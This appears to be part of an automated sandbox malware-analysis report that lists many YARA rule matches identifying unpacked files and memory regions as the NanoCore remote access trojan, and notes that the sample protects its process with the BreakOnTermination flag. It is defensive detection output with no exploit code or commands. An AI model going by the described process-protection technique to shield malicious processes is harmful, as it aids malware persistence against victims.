Source: Yara match File source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR

Operating System Destruction
barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: 01 00 00 00 Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
